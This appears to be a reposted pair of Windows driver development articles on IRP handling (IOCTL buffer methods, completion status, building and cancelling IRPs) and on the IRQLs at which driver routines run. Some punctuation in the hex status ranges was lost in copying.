In METHOD_IN_DIRECT requests, the Irp- >AssociatedIrp.SystemBuffer field contains a kernel-mode copy of the requestor’s input buffer. The Irp- >MdlAddress field contains an MDL that describes the requestor’s output buffer. The I/O Manager readies this buffer for the driver to read. As in read and write operations, the driver must call the MmGetSystemAddressForMdlSafe macro to get a kernel-mode pointer to the buffer described by the MDL.

The input and output buffers are typically used in similar ways for METHOD_OUT_DIRECT and METHOD_IN_DIRECT IOCTLs. The requestor’s input buffer contains a command for the driver or device. The requestor’s output buffer, however, contains the data for the driver to transfer to the device. In effect, it is a second input buffer.

METHOD_NEITHER IOCTLs

A driver can define IOCTLs that use neither direct nor buffered I/O. METHOD_NEITHER IOCTLs have separate user-mode pointers for input and output buffers:

  • IrpSp- >Parameters.DeviceIoControl.Type3InputBuffer points to the input buffer.
  • Irp- >UserBuffer points to the output buffer.

The input and output buffer addresses are user-mode pointers. Therefore, drivers must validate these pointers before using them, by calling the ProbeForRead and ProbeForWrite routines within a try/except block. In addition, the driver must copy all parameters to kernel-mode memory (either in the pool or on the stack) before validating them.

Note   For detailed information on probing and on problems commonly seen in driver I/O paths, see Common Driver Reliability Issues.

Success, Error, and Warning Status for IRP Completion

When a driver completes an IRP with a success or warning status, the I/O Manager:

  • Copies the data from the buffer specified in the IRP back to the user’s buffer, if the IRP specified METHOD_BUFFERED I/O. The driver specifies the number of bytes to be copied in the Irp- >IoStatus.Information field.
  • Copies the results from the IRP’s status block (Irp- >IoStatus.Status and Irp- >IoStatus.Information) to the caller’s original request block.
  • Signals the event specified by the caller that initiated the request.

Not all of these actions occur in all cases. For example, if a driver completes an IRP with an error status, the I/O Manager does not copy any data back to the user’s buffer, and it copies only the value of the Irp- >IoStatus.Status field, not the value of the IoStatus.Information field. If a driver completes an IRP synchronously, the I/O Manager does not signal the event. If a driver completes an IRP asynchronously, the I/O Manager might or might not signal the event. Therefore, a driver that calls ZwReadFile, ZwDeviceIoControl, or similar ZwXxx routines should wait on the event only if the ZwXxx routine returns STATUS_PENDING.

The following values indicate error and warning status codes:

  • NTSTATUS codes 0xC00000000xFFFFFFFF are errors.
  • NTSTATUS codes 0×800000000xBFFFFFFF are warnings.

If the value of the Irp- >IoStatus.Status field is an error code, the operating system does not return any data, so the contents of the Irp- >IoStatus.Information field should always be zero. If the value of the Irp- >IoStatus.Status field is a warning code, the operating system can return data, so the contents of the Irp- >IoStatus.Information field can be nonzero.

A simple scenario can help explain this situation. Assume that an IRP requires a driver to return data in a buffer that is defined with the following two fields.

ULONG Length;
UCHAR Data [];  // Variable length array

The Length field specifies the size required to retrieve the data. The application sends a ULONG request to get the Length, and then sends a second request with a bigger buffer to retrieve all the data. The driver, in turn, always expects the buffer to be at least the size of a ULONG data item.

If the buffer is large enough, the driver completes the IRP with STATUS_SUCCESS, and Length and Irp- >IoStatus.Information receive the number of bytes transferred.

If the buffer is not large enough to hold the data, the driver completes the IRP with the warning STATUS_BUFFER_OVERFLOW. In this case, the data is too large for the buffer. The driver updates the Length with the size required, and writes sizeof(ULONG) into Irp- >IoStatus.Information.

If the buffer is too small to write the required length (that is, the buffer is smaller than sizeof(ULONG)), the driver completes the IRP with the error STATUS_BUFFER_TOO_SMALL and sets Irp- >IoStatus.Information to 0.

Building IRPs

Drivers can create two types of IRPs:

  • Threaded IRPs, also called synchronous requests.
  • Nonthreaded IRPs, also called asynchronous requests.

Threaded IRPs

Threaded IRPs are bound to the current thread of execution when they are created. When the thread terminates, any threaded IRPs associated with it are automatically cancelled.

Drivers create threaded IRPs by calling one of the following routines:

  • IoBuildSynchronousFsdRequest
  • IoBuildDeviceIoControlRequest

IoBuildSynchronousFsdRequest allocates and builds a threaded IRP for a read or write request. IoBuildDeviceIoControlRequest allocates and builds a threaded IRP to send an IOCTL.

When creating a threaded IRP, a driver specifies an event to signal when the IRP is complete and provides pointers to the buffers in which to return the requested data. When every sub-request in the IRP is complete (that is, when all the required drivers have completed the IRP), the entire request is complete. The I/O Manager then performs post-processing as follows:

  • Copies kernel-mode data to user-mode buffers to be returned to the caller. For example, ZwReadFile, IoBuildDeviceIoControlRequest, and similar system support routines pass user-mode buffers.
  • Signals the event, if the response is asynchronous. If the IoCallDriver routine returns STATUS_PENDING, the caller should wait on the event.
  • Copies the value of the Irp- >IoStatus.Status field to the Irp- >UserIosb.Status field of the user I/O status block, if the response is asynchronous. If IoCallDriver returns STATUS_PENDING, the caller can read this field after the event is signaled.
  • Copies the value of the Irp- >IoStatus.Information field to the Irp- >UserIosb.Information field of the user I/O status block, if the response is asynchronous and the I/O request succeeded. If IoCallDriver returns STATUS_PENDING, the caller can read this field after the event is signaled. If the request returns an error status, the I/O Manager does not transfer any data to the user buffers, so the caller should treat the value at Irp- >UserIosb.Information as zero; some driver writers might prefer to zero-initialize the field as an added precaution.
  • Frees the IRP.

Nonthreaded IRPs

Nonthreaded IRPs are not associated with any thread. The driver that initiates a nonthreaded IRP must set a completion routine to "catch" the IRP when it is complete. The I/O Manager does not free nonthreaded IRPs; the driver that initiated the IRP must free it. Nonthreaded IRPs are intended for driver-to-driver communication.

Drivers create nonthreaded IRPs by calling one of the following routines:

  • IoBuildAsynchronousFsdRequest
  • IoAllocateIrp

IoBuildAsynchronousFsdRequest allocates and builds a nonthreaded IRP for a read or write request. IoAllocateIrp allocates an IRP for a driver to send to lower drivers in the same device stack or to another device stack.

IRP Cancellation

IRPs can be cancelled (sometimes described as "recalled"). When an IRP is cancelled, the driver that currently owns the IRP must complete it immediately.

A driver that requires special processing to cancel an IRP must either:

  • Supply an IoCancel routine to be notified when cancellation occurs, and test the Cancel flag in the IRP at various times during processing to determine whether the IRP has been cancelled.
  • Use the new cancel-safe IRP queuing routines (IoCsqXxx).

IRP cancellation can be difficult to code correctly, because cancellation is inherently asynchronous and race conditions can occur at numerous points. The cancel-safe IRP queues greatly simplify cancellation logic, and are strongly recommended for all new drivers. IRP cancellation is covered in the Microsoft Windows Driver Development Kit (DDK) and in Cancel Logic in Windows Drivers.

Debugging I/O Problems

Driver writers can use the Driver Verifier and extensions to the Microsoft debuggers to debug problems in handling IRPs.

Driver Verifier can catch errors in every aspect of IRP handling. It is provided with every version of the operating system, and runs best with a debugger attached. All driver writers must still provide and use test tools that exercise their driver, however, in order for Driver Verifier to detect errors. Use of the Driver Verifier and driver-specific test tools should be a standard part of debugging and development.

The !irp and !irpfind debugger extensions can help in tracing IRPs while debugging. The !irp extension displays detailed information about a specified IRP, and the !irpfind extension displays information about all IRPs in the system, or about one or more IRPs that meet specified criteria. For detailed information about these extensions, see the documentation in the Debugging Tools for Windows package.

Call to Action and Resources

Call to action for driver developers:

  • Return STATUS_CONTINUE_COMPLETION or STATUS_MORE_PROCESSING_REQUIRED from all IoCompletion routines.
  • Understand when to return STATUS_PENDING for an IRP. Return STATUS_PENDING only if you have called the IoMarkIrpPending macro for the IRP, and conversely, call IoMarkIrpPending for an IRP only if you will return STATUS_PENDING.
  • Test the value of the Irp- >PendingReturned flag in IoCompletion routines to optimize post-processing of IRPs.
  • Understand the difference between error status and warning status, and what data the IRP contains for each type of status.
  • Use Driver Verifier to catch errors in IRP handling, and use debugger extensions to understand how individual IRPs are processed.

Resources:

2005年11月04日
 
Kernel-Mode Driver Architecture: Windows DDK

Managing Hardware Priorities

The IRQL at which a driver routine executes determines which kernel-mode driver support routines it can call. For example, some driver support routines require that the caller be running at IRQL DISPATCH_LEVEL. Others cannot be called safely if the caller is running any raised IRQL; that is, at any IRQL higher than PASSIVE_LEVEL.

Following is a list of IRQLs at which the most commonly implemented standard driver routines are called. The IRQLs are listed from lowest to highest priority.

PASSIVE_LEVEL
Interrupts Masked Off — None.

Driver Routines Called at PASSIVE_LEVEL — DriverEntry, AddDevice, Reinitialize, Unload routines, most dispatch routines, driver-created threads, worker-thread callbacks.

APC_LEVEL

Interrupts Masked Off — APC_LEVEL interrupts are masked off.

Driver Routines Called at APC_LEVEL — Some dispatch routines (see Dispatch Routines and IRQLs).

DISPATCH_LEVEL
Interrupts Masked Off — DISPATCH_LEVEL and APC_LEVEL interrupts are masked off. Device, clock, and power failure interrupts can occur.

Driver Routines Called at DISPATCH_LEVEL — StartIo, AdapterControl, AdapterListControl, ControllerControl, IoTimer, Cancel (while holding the cancel spin lock), DpcForIsr, CustomTimerDpc, CustomDpc routines.

DIRQL
Interrupts Masked Off — All interrupts at IRQL<= DIRQL of driver’s interrupt object. Device interrupts with a higher DIRQL value can occur, along with clock and power failure interrupts.

Driver Routines Called at DIRQL — InterruptService, SynchCritSection routines.

The only difference between APC_LEVEL and PASSIVE_LEVEL is that a process executing at APC_LEVEL cannot get APC interrupts. But both IRQLs imply a thread context and both imply that the code can be paged out.

Lowest-level drivers process IRPs while running at one of three IRQLs:

  • PASSIVE_LEVEL, with no interrupts masked off on the processor, in the driver’s Dispatch routine(s)

    DriverEntry, AddDevice, Reinitialize, and Unload routines also are run at PASSIVE_LEVEL, as are any driver-created system threads.

  • DISPATCH_LEVEL, with DISPATCH_LEVEL and APC_LEVEL interrupts masked off on the processor, in the StartIo routine

    AdapterControl, AdapterListControl, ControllerControl, IoTimer, Cancel (while it holds the cancel spin lock), and CustomTimerDpc routines also are run at DISPATCH_LEVEL, as are DpcForIsr and CustomDpc routines.

  • Device IRQL (DIRQL), with all interrupts at less than or equal to the SynchronizeIrql of the driver’s interrupt object(s) masked off on the processor, in the ISR and SynchCritSection routines

Most higher-level drivers process IRPs while running at either of two IRQLs:

  • PASSIVE_LEVEL, with no interrupts masked off on the processor, in the driver’s dispatch routines

    DriverEntry, Reinitialize, AddDevice, and Unload routines also are run at PASSIVE_LEVEL, as are any driver-created system threads or worker-thread callback routines or file system drivers.

  • DISPATCH_LEVEL, with DISPATCH_LEVEL and APC_LEVEL interrupts masked off on the processor, in the driver’s IoCompletion routine(s)

    IoTimer, Cancel, and CustomTimerDpc routines also are run at DISPATCH_LEVEL.

In some circumstances, intermediate and lowest-level drivers of mass-storage devices are called at IRQL APC_LEVEL. In particular, this can occur at a page fault for which a file system driver sends an IRP_MJ_READ request to lower drivers.

Most standard driver routines are run at an IRQL that allows them simply to call the appropriate support routines. For example, a device driver must call AllocateAdapterChannel while running at IRQL DISPATCH_LEVEL. Since most device drivers call these routines from a StartIo routine, usually they are running at DISPATCH_LEVEL already.

Note that a device driver that has no StartIo routine because it sets up and manages its own queues of IRPs is not necessarily running at DISPATCH_LEVEL IRQL when it should call AllocateAdapterChannel. Such a driver must nest its call to AllocateAdapterChannel between calls to KeRaiseIrql and KeLowerIrql so that it runs at the required IRQL when it calls AllocateAdapterChannel and restores the original IRQL when the calling routine regains control.

When calling driver support routines, be aware of the following.

  • Calling KeRaiseIrql with an input NewIrql value that is less than the current IRQL causes a fatal error. Calling KeLowerIrql except to restore the original IRQL (that is, after a call to KeRaiseIrql) also causes a fatal error.
  • While running at raised IRQL, calling KeWaitForSingleObject or KeWaitForMultipleObjects for kernel-defined dispatcher objects to wait for a nonzero interval causes a fatal error.
  • The only driver routines that can safely wait on events, semaphores, mutexes, or timers are those that run in a nonarbitrary thread context at IRQL PASSIVE_LEVEL, such as driver-created threads, the DriverEntry and Reinitialize routines, or dispatch routines for inherently synchronous I/O operations (such as most device I/O control requests).
  • Even while running at IRQL PASSIVE_LEVEL, pageable driver code must not call KeSetEvent, KeReleaseSemaphore, or KeReleaseMutex with the input Wait parameter set to TRUE. Such a call can cause a fatal page fault.
  • Any routine that is running at greater than IRQL APC_LEVEL can neither allocate memory from paged pool nor access memory in paged pool safely. If a routine running at IRQL greater than APC_LEVEL causes a page fault, it is a fatal error.
  • A driver must be running at IRQL DISPATCH_LEVEL when it calls KeAcquireSpinLockAtDpcLevel and KeReleaseSpinLockFromDpcLevel.

    A driver can be running at IRQL <= DISPATCH_LEVEL when it calls KeAcquireSpinLock but it must release that spin lock by calling KeReleaseSpinLock. In other words, it is a programming error to release a spin lock acquired with KeAcquireSpinLock by calling KeReleaseSpinLockFromDpcLevel.

    A driver must not call KeAcquireSpinLockAtDpcLevel, KeReleaseSpinLockFromDpcLevel, KeAcquireSpinLock, or KeReleaseSpinLock while running at IRQL>DISPATCH_LEVEL.

  • Calling a support routine that uses a spin lock, such as an ExInterlockedXxx routine, raises IRQL on the current processor either to DISPATCH_LEVEL or to DIRQL if the caller is not already running at raised IRQL.
  • Driver code that runs at raised IRQL should execute as quickly as possible. The higher the IRQL at which a routine runs, the more important it is for good overall performance to tune that routine to execute as quickly as possible. For example, any driver that calls KeRaiseIrql should make the reciprocal call to KeLowerIrql as soon as it can.